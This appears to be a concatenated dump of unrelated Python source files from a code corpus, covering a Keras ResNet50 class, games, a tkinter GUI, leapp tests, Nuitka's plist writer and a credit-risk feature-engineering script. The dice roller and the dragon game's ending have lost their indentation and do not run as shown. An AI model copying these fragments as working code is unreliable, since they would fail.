        x_shortcut = input_tensor
        # First Block of main path
        x = self.main_path_block(
            input_tensor,
            filters[0],
            (1, 1),
            'valid',
            conv_name_base + '2a',
            batch_norm_name_base + '2a',
            'relu'
        )
        # Middle Block of main path
        x = self.main_path_block(
            x,
            filters[1],
            (
                middle_filter_size,
                middle_filter_size
            ),
            'same',
            conv_name_base + '2b',
            batch_norm_name_base + '2b',
            'relu'
        )
        # Last Block of main path.
        # Fix: no activation here -- ResNet applies the ReLU only after
        # the shortcut addition (consistent with convolutional_block).
        x = self.main_path_block(
            x,
            filters[2],
            (1, 1),
            'valid',
            conv_name_base + '2c',
            batch_norm_name_base + '2c',
            None
        )
        # Skip Connection
        x = Add()([x, x_shortcut])
        x = Activation('relu')(x)
        return x

    def convolutional_block(self, input_tensor, middle_filter_size, filters, stage, block, stride=2):
        """
        Implementation of the Convolutional Block (shortcut carries a 1x1
        strided convolution so the shapes of the two branches match)
        Arguments:
            input_tensor -> tensor; Input Tensor (n, h, w, c)
            middle_filter_size -> integer; Size of filter in the middle convolutional block
            filters -> integer list; Number of filters in the convolutional blocks
            stage -> integer; Denotes position of the block in the network
            block -> string; Denotes name of the block
            stride -> integer; Stride in the convolutional layer
        Output:
            returns -> tensor; Output Tensor (h, w, c)
        """
        # Set the naming convention
        conv_name_base = 'res' + str(stage) + block + '_branch'
        batch_norm_name_base = 'batch_norm' + str(stage) + block + '_branch'
        x_shortcut = input_tensor
        ## MAIN PATH ##
        # First Block of Main Path (downsamples via `stride`)
        x = self.main_path_block(
            input_tensor,
            filters[0],
            (1, 1),
            'valid',
            conv_name_base + '2a',
            batch_norm_name_base + '2a',
            'relu',
            (stride, stride)
        )
        # Middle Block of main path
        x = self.main_path_block(
            x,
            filters[1],
            (
                middle_filter_size,
                middle_filter_size
            ),
            'same',
            conv_name_base + '2b',
            batch_norm_name_base + '2b',
            'relu'
        )
        # Last Block of main path (no activation before the Add)
        x = self.main_path_block(
            x,
            filters[2],
            (1, 1),
            'valid',
            conv_name_base + '2c',
            batch_norm_name_base + '2c',
            None
        )
        ## Skip Connection Convolutional Block ##
        x_shortcut = self.main_path_block(
            x_shortcut,
            filters[2],
            (1, 1),
            'valid',
            conv_name_base + '1',
            batch_norm_name_base + '1',
            None,
            (stride, stride)
        )
        # Skip Connection
        x = Add()([x, x_shortcut])
        x = Activation('relu')(x)
        return x

    def build_model(self):
        """
        Implementation of the Resnet50 Architecture; stores the compiled
        graph in `self.model`.
        """
        input_placeholder = Input(shape=self.input_shape)
        x = ZeroPadding2D((3, 3))(input_placeholder)
        # Stage 1
        x = self.main_path_block(x, 64, (7, 7), 'valid', 'conv1', 'bn_conv1', 'relu', (2, 2))
        x = MaxPooling2D((3, 3), strides=(2, 2))(x)
        # Stage 2
        x = self.convolutional_block(x, 3, [64, 64, 256], 2, 'a', 1)
        x = self.identity_block(x, 3, [64, 64, 256], 2, 'b')
        x = self.identity_block(x, 3, [64, 64, 256], 2, 'c')
        # Stage 3
        x = self.convolutional_block(x, 3, [128, 128, 512], 3, 'a', 2)
        x = self.identity_block(x, 3, [128, 128, 512], 3, 'b')
        x = self.identity_block(x, 3, [128, 128, 512], 3, 'c')
        x = self.identity_block(x, 3, [128, 128, 512], 3, 'd')
        # Stage 4
        x = self.convolutional_block(x, 3, [256, 256, 1024], 4, 'a', 2)
        x = self.identity_block(x, 3, [256, 256, 1024], 4, 'b')
        x = self.identity_block(x, 3, [256, 256, 1024], 4, 'c')
        x = self.identity_block(x, 3, [256, 256, 1024], 4, 'd')
        x = self.identity_block(x, 3, [256, 256, 1024], 4, 'e')
        x = self.identity_block(x, 3, [256, 256, 1024], 4, 'f')
        # Stage 5
        x = self.convolutional_block(x, 3, [512, 512, 2048], 5, 'a', 2)
        x = self.identity_block(x, 3, [512, 512, 2048], 5, 'b')
        x = self.identity_block(x, 3, [512, 512, 2048], 5, 'c')
        # Average Pooling Layer
        x = AveragePooling2D((2, 2), name='avg_pool')(x)
        # Fully Connected (classification) Layer
        x = Flatten()(x)
        x = Dense(
            self.classes,
            activation='softmax',
            name='fc_' + str(self.classes),
            kernel_initializer=glorot_uniform(seed=0)
        )(x)
        self.model = Model(input_placeholder, x, name='Resnet50')

    def summary(self):
        """Print the Keras layer-by-layer summary of the built model."""
        self.model.summary()
|
993,509 | d4ba5a4d7ebc2427d5a8725c671c4728b76fca29 | #coding:utf-8
"""
多继承: 一个类可以同时继承多个父类
会将多个父类的方法属性继承过来
""" |
993,510 | 74ad320f5a7d676a94ab26da09ab46280875c5ea | import random
import sys
sys.setrecursionlimit(5000)
sys.modules['_decimal'] = None
import decimal
from decimal import *
from decimal import Decimal
getcontext().Emin = -10 * 10000
getcontext().Emax = 10 * 10000
getcontext().traps[Overflow] = 0
getcontext().traps[Underflow] = 0
getcontext().traps[DivisionByZero] = 0
getcontext().traps[InvalidOperation] = 0
getcontext().prec = 100
class Naga:
    """A battle dragon with HP, attack and defense statistics."""

    def __init__(self, nama, hp_maks, attack, defense):
        # type: (str, Decimal, Decimal, Decimal) -> None
        self.nama = nama
        self.hp_maks = hp_maks
        self.hp_sementara = hp_maks  # current HP starts at full health
        self.attack = attack
        self.defense = defense

    def serang(self, musuh):
        # type: (Naga) -> str
        """Attack `musuh`, lower its current HP and return a battle report."""
        # Damage is attack minus defense, floored at zero.
        if self.attack > musuh.defense:
            damage = self.attack - musuh.defense
        else:
            damage = 0
        musuh.hp_sementara -= damage
        return (
            f"{self.nama} mendaratkan serangan dengan damage sebesar {damage}"
            f" kepada {musuh.nama}. HP sementara {musuh.nama} sekarang adalah"
            f" {musuh.hp_sementara}."
        )

    def __str__(self):
        # type: () -> str
        return (
            f"Nama: {self.nama}\n"
            f"HP: {self.hp_sementara}/{self.hp_maks}\n"
            f"Attack: {self.attack}\n"
            f"Defense: {self.defense}\n"
        )
# Roster of selectable dragons: (name, max HP, attack, defense).
# NOTE(review): Decimal("5e4") keeps its exponent, so stats display as
# e.g. "5E+4" in __str__ output -- confirm that is acceptable.
daftar_naga: list = [
    Naga("Tara", Decimal("5e4"), Decimal("3.5e3"), Decimal("2.47e3")),
    Naga("Eko", Decimal("4.85e4"), Decimal("3.44e3"), Decimal("2.75e3")),
    Naga("Adi", Decimal("5.11e4"), Decimal("3.33e3"), Decimal("2.49e3"))
]
def main():
    """
    Run one interactive play session of the dragon-fight game.
    :return:
    """
    print("Berikut adalah daftar naga yang tersedia.")
    for naga in daftar_naga:
        # Heal every dragon before a new fight (roster objects are reused).
        naga.hp_sementara = naga.hp_maks
        print(naga)
    indeks_naga: int = int(input("Tolong masukkan indeks dari naga pilihan Anda: "))
    while indeks_naga < 0 or indeks_naga >= len(daftar_naga):
        indeks_naga = int(input("Maaf, input Anda tidak sah! Tolong masukkan indeks dari naga pilihan Anda: "))
    naga_pilihan: Naga = daftar_naga[indeks_naga]
    # NOTE(review): the opponent is drawn from the full roster, so it can be
    # the very same object the player picked (a self-fight) -- confirm intended.
    naga_musuh: Naga = daftar_naga[random.randint(0, len(daftar_naga) - 1)]
    print(naga_pilihan)
    print(naga_musuh)
    giliran: int = 0  # turn counter, initial value
    # Odd turn numbers belong to the player, even ones to the enemy.
    # NOTE(review): the loop ends when HP drops below 0; reaching exactly 0
    # exits without printing a win/lose message.
    while naga_pilihan.hp_sementara >= 0 and naga_musuh.hp_sementara >= 0:
        giliran += 1
        if giliran % 2 == 1:
            print(naga_pilihan.serang(naga_musuh))
        else:
            print(naga_musuh.serang(naga_pilihan))
        if naga_musuh.hp_sementara < 0:
            print("Anda menang!!!")
            break
        if naga_pilihan.hp_sementara < 0:
            print("Anda kalah!!!")
            break
    print("Tekan Y untuk ya.")
    print("Tekan tombol apapun yang lainnya untuk tidak.")
    tanya: str = input("Apakah Anda mau bertarung lagi? ")
    if tanya == "Y":
        # Replay via recursion -- relies on the raised recursion limit set
        # at module top for long sessions.
        main()
    else:
        sys.exit()
if __name__ == '__main__':
main()
|
993,511 | f1c1f09653087f5e2c4702e8fd5e4acd67f3c515 | import tkinter
import tkinter.messagebox
import pickle
# main (root) GUI menu
class CrudGUI:
    """Root menu window: choose a CRUD action via radio buttons; OK opens
    the matching sub-window (only 'look up' is implemented so far)."""
    def __init__(self, master):
        self.master = master
        self.master.title('Welcome Menu')
        self.top_frame = tkinter.Frame(self.master)
        self.bottom_frame = tkinter.Frame(self.master)
        # Selected action: 1=look up, 2=add, 3=change email, 4=delete.
        self.radio_var = tkinter.IntVar()
        self.radio_var.set(1)
        # create the radio buttons
        self.look = tkinter.Radiobutton(self.top_frame, text='Look up customer',
                                        variable=self.radio_var, value=1)
        self.add = tkinter.Radiobutton(self.top_frame, text='Add Customer',
                                       variable=self.radio_var, value=2)
        self.change = tkinter.Radiobutton(self.top_frame, text='Change customer email',
                                          variable=self.radio_var, value=3)
        self.delete = tkinter.Radiobutton(self.top_frame, text='Delete customer',
                                          variable=self.radio_var, value=4)
        # pack the radio buttons
        self.look.pack(anchor='w', padx=20)
        self.add.pack(anchor='w', padx=20)
        self.change.pack(anchor='w', padx=20)
        self.delete.pack(anchor='w', padx=20)
        # create ok and quit buttons
        self.ok_button = tkinter.Button(self.bottom_frame, text='OK', command=self.open_menu)
        self.quit_button = tkinter.Button(self.bottom_frame, text='QUIT', command=self.master.destroy)
        # pack the buttons
        self.ok_button.pack(side='left')
        self.quit_button.pack(side='left')
        # pack the frames
        self.top_frame.pack()
        self.bottom_frame.pack()
    def open_menu(self):
        """Open the window matching the selected radio button."""
        # Only the 'look up' action has a window; the rest show a stub dialog.
        if self.radio_var.get() == 1:
            search = LookGUI(self.master)
        else:
            tkinter.messagebox.showinfo('Function', 'still under construction')
class LookGUI:
    """Secondary window that looks up a customer by name in the pickled
    customer dictionary (customer_file.dat)."""
    def __init__(self, master):
        # open the file, load to customers, close file. Do in each class
        # so every window sees the freshest saved data.
        try:
            input_file = open("customer_file.dat", 'rb')
            self.customers = pickle.load(input_file)
            input_file.close()
        except (FileNotFoundError, IOError):
            # No saved data yet: start from an empty customer dict.
            self.customers = {}
        # tkinter.Toplevel() is like tkinter.Frame() but it opens in a new window
        self.look = tkinter.Toplevel(master)
        self.look.title('Search for customer')
        # create Frames for this Toplevel window
        self.top_frame = tkinter.Frame(self.look)
        self.middle_frame = tkinter.Frame(self.look)
        self.bottom_frame = tkinter.Frame(self.look)
        # widgets for top frame - label and entry box for name
        self.search_label = tkinter.Label(self.top_frame, text='Enter customer name to look for: ')
        self.search_entry = tkinter.Entry(self.top_frame, width=15)
        # pack top frame
        self.search_label.pack(side='left')
        self.search_entry.pack(side='left')
        # middle frame - label for results (bound to a StringVar so search()
        # can update the text in place)
        self.value = tkinter.StringVar()
        self.info = tkinter.Label(self.middle_frame, text='Results: ')
        self.result_label = tkinter.Label(self.middle_frame, textvariable=self.value)
        # pack Middle frame
        self.info.pack(side='left')
        self.result_label.pack(side='left')
        # buttons for bottom frame
        self.search_button = tkinter.Button(self.bottom_frame, text='Search', command=self.search)
        self.back_button = tkinter.Button(self.bottom_frame, text='Main Menu', command=self.back)
        # pack bottom frame
        self.search_button.pack(side='left')
        self.back_button.pack(side='left')
        # pack frames
        self.top_frame.pack()
        self.middle_frame.pack()
        self.bottom_frame.pack()
    def search(self):
        """Look up the entered name and display the result (or 'Not Found')."""
        name = self.search_entry.get()
        result = self.customers.get(name, 'Not Found')
        self.value.set(result)
    def back(self):
        """Close this window and return to the main menu."""
        self.look.destroy()
def main():
    """Build the root window, attach the menu GUI and enter the event loop."""
    # create a window
    root = tkinter.Tk()
    # call the GUI and send it the root menu
    menu_gui = CrudGUI(root)
    # control the mainloop from main instead of the class
    root.mainloop()

main()
|
993,512 | 7aee90f77331e2779884f28c7d13f2736d545d2d | import pytest
from leapp.exceptions import StopActorExecutionError
from leapp.libraries.actor import initrdinclude
from leapp.libraries.stdlib import api, CalledProcessError
from leapp.libraries.common.testutils import CurrentActorMocked, logger_mocked
from leapp.models import InitrdIncludes, InstalledTargetKernelVersion
INCLUDES1 = ["/file1", "/file2", "/dir/ect/ory/file3"]
INCLUDES2 = ["/file4", "/file5"]
KERNEL_VERSION = "4.18.0"
def raise_call_error(args=None):
    """Raise a CalledProcessError carrying a canned fake process result."""
    fake_result = {'signal': None, 'exit_code': 1, 'pid': 0, 'stdout': 'fake', 'stderr': 'fake'}
    raise CalledProcessError(
        message='A Leapp Command Error occured.',
        command=args,
        result=fake_result)
class RunMocked(object):
    """Callable stand-in for `run` that records how it was invoked.

    Tracks the number of calls and the most recent argument list; when
    built with raise_err=True, every call raises a CalledProcessError
    through raise_call_error().
    """
    def __init__(self, raise_err=False):
        self.called = 0
        self.args = []
        self.raise_err = raise_err

    def __call__(self, args):
        self.called, self.args = self.called + 1, args
        if self.raise_err:
            raise_call_error(args)
def test_no_includes(monkeypatch):
    """With no InitrdIncludes messages, dracut must not be invoked."""
    run_mocked = RunMocked()
    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(msgs=[]))
    monkeypatch.setattr(api, 'current_logger', logger_mocked())
    monkeypatch.setattr(initrdinclude, 'run', run_mocked)
    initrdinclude.process()
    # The actor should log why it skipped and never shell out.
    assert "No additional files required to add into the initrd." in api.current_logger.dbgmsg
    assert not run_mocked.called
def test_no_kernel_version(monkeypatch):
    """Includes present but no InstalledTargetKernelVersion: abort before dracut."""
    run_mocked = RunMocked()
    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(
        msgs=[InitrdIncludes(files=INCLUDES1), InitrdIncludes(files=INCLUDES2)]))
    monkeypatch.setattr(initrdinclude, 'run', run_mocked)
    with pytest.raises(StopActorExecutionError) as e:
        initrdinclude.process()
    assert 'Cannot get version of the installed RHEL-8 kernel' in str(e)
    # dracut must never run when the kernel version is unknown.
    assert not run_mocked.called
def test_dracut_fail(monkeypatch):
    """A failing dracut run (CalledProcessError) must become a StopActorExecutionError."""
    run_mocked = RunMocked(raise_err=True)
    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(
        msgs=[InitrdIncludes(files=INCLUDES1), InitrdIncludes(files=INCLUDES2),
              InstalledTargetKernelVersion(version=KERNEL_VERSION)]))
    monkeypatch.setattr(initrdinclude, 'run', run_mocked)
    with pytest.raises(StopActorExecutionError) as e:
        initrdinclude.process()
    assert 'Cannot regenerate dracut image' in str(e)
    # The failure happened *inside* the invoked command, so run was called.
    assert run_mocked.called
def test_flawless(monkeypatch):
    """Happy path: includes + kernel version present -> dracut runs and
    receives every requested file in its argument list."""
    run_mocked = RunMocked()
    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(
        msgs=[InitrdIncludes(files=INCLUDES1), InitrdIncludes(files=INCLUDES2),
              InstalledTargetKernelVersion(version=KERNEL_VERSION)]))
    monkeypatch.setattr(initrdinclude, 'run', run_mocked)
    initrdinclude.process()
    assert run_mocked.called
    for f in INCLUDES1 + INCLUDES2:
        # Fix: the previous `assert (f in arg for arg in ...)` asserted a
        # bare generator object, which is always truthy and checked
        # nothing; any() actually verifies each file reached the command.
        assert any(f in arg for arg in run_mocked.args)
|
993,513 | 64f3495358e96fd438f06e72cbb4e81c64c7982f | # Time: O(n), where n=size(tree)
# Space: O(logn), stack space ~height of tree
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def sortedArrayToBST(self, nums: List[int]) -> TreeNode:
        """Convert a sorted array into a height-balanced BST.

        Recurses on index bounds rather than slicing, so no sub-array
        copies (nums[:mid] / nums[mid+1:]) are ever created.
        """
        return self.util(nums, 0, len(nums) - 1)

    def util(self, nums, left, right):
        # An empty index range contributes no node.
        if left > right:
            return None
        middle = left + (right - left) // 2
        node = TreeNode(nums[middle])
        node.left = self.util(nums, left, middle - 1)
        node.right = self.util(nums, middle + 1, right)
        return node
|
993,514 | 95277f65eee48987f77ff3f2c4c4c967da7a888b | #dict basics
fares = {10,20,30}
print(type(fares))#set
titanicData = {'id':(5,7,10), 'fare':(10,20,30), 'Sex':['Male','Female','NA']}
print(type(titanicData))
#tuple accessing
titanicData['id']
titanicData['Sex']
titanicData['pid']#if acces like this will throw error
titanicData.get('pid')#no error
type(titanicData.get('pid'))#NoneType. Means no data with 'pid' in titanicData variable.
#Padas.dataframe and dict
import pandas as pd
titanicDF = pd.DataFrame(titanicData)
type(titanicDF)
titanicDF['id']
print(titanicDF['id'])#int
titanicDF['Sex']
type(titanicDF['Sex'])#Series
|
993,515 | abc6fe125b375671e67a73275169372bef70edc3 | # Copyright 2023, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" For macOS application bundle creation
"""
import os
from nuitka import Options, OutputDirectories
from nuitka.containers.OrderedDicts import OrderedDict
from .FileOperations import copyFile, makePath, openTextFile
from .Images import convertImageToIconFormat
def createPlistInfoFile(logger, onefile):
    """Create the Info.plist file of a macOS application bundle.

    Collects bundle metadata from the user options (display name, signed
    identifier, version, icon, background/UI-element mode, protected
    resource usage descriptions), converts the icon to .icns format when
    needed, and serializes the plist into the bundle directory.

    Args:
        logger: logger used for progress messages and fatal errors
        onefile: whether the build is a onefile build
    """
    # Many details, pylint: disable=too-many-locals
    import plistlib

    # The plist is written next to the bundle contents; standalone and
    # non-standalone builds locate their result directory differently.
    if Options.isStandaloneMode():
        bundle_dir = os.path.dirname(OutputDirectories.getStandaloneDirectoryPath())
    else:
        bundle_dir = os.path.dirname(
            OutputDirectories.getResultRunFilename(onefile=onefile)
        )
    result_filename = OutputDirectories.getResultFullpath(onefile=onefile)
    # Fall back to the executable base name when no app name was given.
    app_name = Options.getMacOSAppName() or os.path.basename(result_filename)
    executable_name = os.path.basename(
        OutputDirectories.getResultFullpath(onefile=Options.isOnefileMode())
    )
    signed_app_name = Options.getMacOSSignedAppName() or app_name
    app_version = Options.getMacOSAppVersion() or "1.0"
    # OrderedDict keeps the plist key order stable across builds.
    infos = OrderedDict(
        [
            ("CFBundleDisplayName", app_name),
            ("CFBundleName", app_name),
            ("CFBundleIdentifier", signed_app_name),
            ("CFBundleExecutable", executable_name),
            ("CFBundleInfoDictionaryVersion", "6.0"),
            ("CFBundlePackageType", "APPL"),
            ("CFBundleShortVersionString", app_version),
        ]
    )
    icon_paths = Options.getIconPaths()
    if icon_paths:
        # Only a single icon is supported for macOS bundles.
        assert len(icon_paths) == 1
        icon_path = icon_paths[0]
        # Convert to single macOS .icns file if necessary
        if not icon_path.endswith(".icns"):
            logger.info(
                "File '%s' is not in macOS icon format, converting to it." % icon_path
            )
            icon_build_path = os.path.join(
                OutputDirectories.getSourceDirectoryPath(onefile=onefile),
                "icons",
            )
            makePath(icon_build_path)
            converted_icon_path = os.path.join(
                icon_build_path,
                "Icons.icns",
            )
            convertImageToIconFormat(
                logger=logger,
                image_filename=icon_path,
                converted_icon_filename=converted_icon_path,
            )
            icon_path = converted_icon_path
        # Copy the icon into the bundle's Resources folder and reference it.
        icon_name = os.path.basename(icon_path)
        resources_dir = os.path.join(bundle_dir, "Resources")
        makePath(resources_dir)
        copyFile(icon_path, os.path.join(resources_dir, icon_name))
        infos["CFBundleIconFile"] = icon_name
    # Console mode, which is why we have to use bundle in the first place typically.
    if Options.isMacOSBackgroundApp():
        infos["LSBackgroundOnly"] = True
    elif Options.isMacOSUiElementApp():
        infos["LSUIElement"] = True
    else:
        infos["NSHighResolutionCapable"] = True
    # User-declared privacy / protected-resource usage descriptions;
    # duplicates of already-set keys are rejected hard.
    for resource_name, resource_desc in Options.getMacOSAppProtectedResourcesAccesses():
        if resource_name in infos:
            logger.sysexit("Duplicate value for '%s' is not allowed." % resource_name)
        infos[resource_name] = resource_desc
    filename = os.path.join(bundle_dir, "Info.plist")
    # Python2 plistlib serializes through a different API than Python3.
    if str is bytes:
        plist_contents = plistlib.writePlistToString(infos)
    else:
        plist_contents = plistlib.dumps(infos)
    with openTextFile(filename=filename, mode="wb") as plist_file:
        plist_file.write(plist_contents)
|
993,516 | c7799b7af465e2b3d62b2aafc92f05b175a5df1f | #!/usr/bin/env python
'''
Beating the stock market
Given an array for which the ith element is price of given stock on day i.
If you were only permitted to buy one share of the stock and sell one share of the
stock, design an algorithm to find best times to buy and sell
'''
def bestBuySell(stock):
    '''Return (buy_day, sell_day) maximizing profit for one buy + one sell.

    Single left-to-right pass: remember the cheapest day seen so far and
    keep the best spread found against it.  When no profitable trade
    exists (or fewer than two prices), both indices stay 0.
    '''
    buy = sell = cheapest = 0
    best_profit = 0
    for day, price in enumerate(stock):
        if price < stock[cheapest]:
            cheapest = day
        profit = price - stock[cheapest]
        if profit > best_profit:
            best_profit = profit
            sell = day
            buy = cheapest
    return (buy, sell)
if __name__ == '__main__':
    stock = [1, 3, 0, 8, 7, 6, 9]
    buy, sell = bestBuySell(stock)
    # Parenthesized so the demo prints identically under Python 2 and 3
    # (the rest of the file previously used the py2-only print statement).
    print('Buy on {}. Sell on {}'.format(buy, sell))
|
993,517 | 83862050556dc6efcf0ed34d2fd54718b0888ce7 | from random import seed
from random import randint
seed()
stop = 1
while stop:
value = randint(1, 6)
print("Type 'r' to roll the dice")
print("Type 's' to stop")
rollAgain = input()
if rollAgain == "r":
print("DICE VALUE: "+ str(value) +"\n")
continue
else:
if rollAgain == "s":
exit() |
993,518 | dd5db504a3cab012dbff723862c7caa4f775d131 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
# 忽略警告
import warnings
warnings.filterwarnings('ignore')
# 单个单元格多个输出
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = 'all'
import lightgbm as lgb
import xgboost as xgb
import catboost as cab
from sklearn.metrics import *
# In[2]:
#节约内存
def reduce_mem_usage(df):
    """Downcast every column of `df` to the narrowest dtype that can hold
    its value range and report the memory saved.

    Integer columns try int8/int16/int32/int64 (left unchanged when no
    candidate fits), float columns fall back to float64 when neither
    float16 nor float32 fits, and object columns become categoricals.
    The dataframe is modified and also returned.
    """
    start_mem = df.memory_usage().sum() / 1024 ** 2
    print('Memory usage of dataframe is {:.2f} MB'.format(start_mem))
    for col in df.columns:
        col_type = df[col].dtype
        if col_type == object:
            df[col] = df[col].astype('category')
            continue
        c_min = df[col].min()
        c_max = df[col].max()
        if str(col_type)[:3] == 'int':
            # First integer width whose range covers the column wins.
            for target in (np.int8, np.int16, np.int32, np.int64):
                info = np.iinfo(target)
                if c_min > info.min and c_max < info.max:
                    df[col] = df[col].astype(target)
                    break
        else:
            # Floats always get cast: narrow when possible, else float64.
            target = np.float64
            for narrow in (np.float16, np.float32):
                info = np.finfo(narrow)
                if c_min > info.min and c_max < info.max:
                    target = narrow
                    break
            df[col] = df[col].astype(target)
    end_mem = df.memory_usage().sum() / 1024 ** 2
    print('Memory usage after optimization is: {:.2f} MB'.format(end_mem))
    print('Decreased by {:.1f}%'.format(100 * (start_mem - end_mem) / start_mem))
    return df
# In[3]:
# 读取数据
original_data = pd.read_csv('data_with_all_feature.csv')
original_data.head()
# In[4]:
# 缺失率统计
null_count_df = original_data.isnull().sum().to_frame()
null_count_df['var'] = null_count_df.index
null_count_df.reset_index(drop=True,inplace=True)
null_count_df.rename(columns={0:'null_counts'},inplace=True)
null_count_df['null_rates'] = null_count_df['null_counts'] / len(original_data)
null_count_df.head().append(null_count_df.tail())
# In[5]:
# 过滤掉覆盖率小于0.01的变量
# len(null_count_df[null_count_df['null_rates']>=0.99])
filter_var = null_count_df[null_count_df['null_rates']<=0.99]['var'].tolist()
# filter_var
filter_data = original_data[filter_var]
filter_data.drop(['mobile_md5','id_number_md5','name_md5','name','mobile'],axis=1,inplace=True)
filter_data.head()
# In[6]:
# 删除倾斜特征
# 目的:判断是否存在某个特征的某个值占比超过99%,一般会删除该特征
def value_counts_sta(df):
    """Find heavily skewed ("lean") columns.

    A column is lean when its single most frequent value accounts for at
    least 99% of the column's non-null entries; such near-constant
    features are dropped before modelling (see the call site below).

    Fixes vs. the previous revision: the old code read the value_counts
    frame through a column named after the series, which breaks on
    pandas >= 2.0 where that column is always named 'count'; it also
    raised IndexError on all-null columns.  Positional access via
    ``iloc`` avoids both problems without changing the result.

    :param df: input dataframe
    :return: list of lean column names
    """
    lean_cols = []
    for col in df.columns:
        # Sorted descending by frequency; NaN excluded by default.
        counts = df[col].value_counts()
        if len(counts) and counts.iloc[0] / counts.sum() >= 0.99:
            lean_cols.append(col)
    return lean_cols
filter_data.drop(value_counts_sta(filter_data),axis=1,inplace=True)
filter_data.shape
# In[7]:
filter_data.info()
data_bin = filter_data.copy()
# In[8]:
# iv值过滤 大于0.03
from tqdm import tqdm
dic_bin = pd.DataFrame()
# 数值变量
num_cols = filter_data.select_dtypes(exclude=['category','object']).columns.tolist()
num_cols.remove('y_label')
for var in tqdm(num_cols):
s_col = [var] + ['y_label']
temp_df = data_bin[s_col]
temp_df[var] = pd.qcut(temp_df[var],5,duplicates='drop')
temp_df[var] = temp_df[var].replace(np.NaN,'missing')
bin_group = temp_df.groupby(var)['y_label'].agg([('bad_ratio','mean'),('count','count'),('bad_num','sum')]).reset_index()
bin_group['good_num'] = bin_group['count']-bin_group['bad_num']
target0_num=bin_group['good_num'].sum()
target1_num=bin_group['bad_num'].sum()
bin_group['good_perc']=(bin_group['good_num']+1)/(target0_num+1)
bin_group['bad_perc']=(bin_group['bad_num']+1)/(target1_num+1)
bin_group['woe'] = np.log((bin_group['bad_perc'])/(bin_group['good_perc']))
bin_group['iv'] = (bin_group['bad_perc']-bin_group['good_perc'])*bin_group['woe']
bin_group['total_iv']=bin_group['iv'].sum()
bin_group['var_name']=var
bin_group.columns=['bin','bad_ratio','count','bad_num','good_num','good_perc','bad_perc','woe','iv','total_iv','var_name']
# data_woe[var]=data_bin[var].map(dict(zip(bin_group.bin,bin_group.woe)))
dic_bin=pd.concat([dic_bin,bin_group])
dic_bin.to_csv('var_iv.csv',index=0,encoding='gbk')
# In[9]:
# 选择iv大于0.02 小于0.5的变量以及类别变量
iv_var = set(dic_bin[(dic_bin['total_iv']>=0.02) & (dic_bin['total_iv']<=0.5)]['var_name'])
select_var = filter_data.select_dtypes(include=['category','object']).columns.tolist() + list(iv_var) + ['y_label']
# 删除关联key信息
drop_list = [
'gaode_手机号/设备号',
'haoduoshu_name',
'haoduoshu_姓名',
'liandong_编号',
'liandong_加密手机号',
'liandong_加密ID',
'liandong_加密姓名',
'qianweidu_id',
'tenxun_phonenum_md5',
'tenxun_id_card_md5',
'tenxun_name',
'tenxun_general_tag']
filter_data = filter_data[select_var].drop(drop_list,axis=1)
filter_data.to_csv('filter_data.csv',index=0,encoding='gbk')
filter_data.head()
# # 数据分析EDA
# In[10]:
# 缺失率统计
null_count_df = filter_data.isnull().sum().to_frame()
null_count_df['var'] = null_count_df.index
null_count_df.reset_index(drop=True,inplace=True)
null_count_df.rename(columns={0:'null_counts'},inplace=True)
null_count_df['null_rates'] = null_count_df['null_counts'] / len(original_data)
null_count_df.to_csv('null_counts.csv',index=False,encoding='gbk')
# In[11]:
# 类别特征
cat_features = filter_data.select_dtypes(include=['object']).columns.tolist()
for col in cat_features:
print('类别特征的值个数:',(col,filter_data[col].nunique()))
# 数值特征
num_features = filter_data.select_dtypes(exclude=['object']).columns.tolist()
len(num_features)
# In[12]:
# 类别特征数据观察
# haoduoshu_手机可信等级 分布情况 做one hot编码
f, [ax1,ax2] = plt.subplots(2, 1, figsize=(15, 15))
sns.countplot(x = 'haoduoshu_手机可信等级' ,data = filter_data,ax = ax1)
sns.countplot(x = 'haoduoshu_手机可信等级', hue = 'y_label',hue_order = [0, 1],data = filter_data , ax = ax2)
# 其他为日期,单独一个日期date意义不大,建议删除,
# liandong_t_drcard_trans_tim_first liandong_t_drcard_trans_tim_curr日期做差 后者-前者
# liandong_t_crdt_trans_tim_first liandong_t_crdt_trans_tim_curr日期做差
# 身份证可以提取年龄,地区等信息
# In[13]:
# 数值特征数据观察 已经计算了iv值,筛选出的具有预测能力的变量不需要做更多关注。
# 观察变量与目标值的相关性
# filter_data[num_features].corr()
# # 特征工程
# In[14]:
# id_number 提取年龄,地区
filter_data['age'] = filter_data['id_number'].map(lambda x: 2020- int(str(x)[6:10]))
filter_data['cus_area'] = filter_data['id_number'].map(lambda x: str(x)[:6])
filter_data.drop(['id_number'],axis=1,inplace=True)
filter_data.shape
# In[15]:
# 日期特征,计算时间差
filter_data['liandong_t_drcard_trans_tim_used_days'] = (pd.to_datetime(filter_data['liandong_t_drcard_trans_tim_curr'],format='%Y-%m-%d', errors='coerce') -
pd.to_datetime(filter_data['liandong_t_drcard_trans_tim_first'], format='%Y-%m-%d', errors='coerce')).dt.days
filter_data['liandong_t_crdt_trans_tim_used_days'] = (pd.to_datetime(filter_data['liandong_t_crdt_trans_tim_curr'], format='%Y-%m-%d', errors='coerce') -
pd.to_datetime(filter_data['liandong_t_crdt_trans_tim_first'], format='%Y-%m-%d', errors='coerce')).dt.days
filter_data[['liandong_t_drcard_trans_tim_used_days','liandong_t_crdt_trans_tim_used_days']].head()
# filter_data.drop(['date','liandong_t_drcard_trans_tim_first',
# 'liandong_t_drcard_trans_tim_curr',
# 'liandong_t_crdt_trans_tim_first',
# 'liandong_t_crdt_trans_tim_curr'],axis=1,inplace=True)
filter_data.shape
# In[16]:
from sklearn.model_selection import StratifiedKFold,KFold
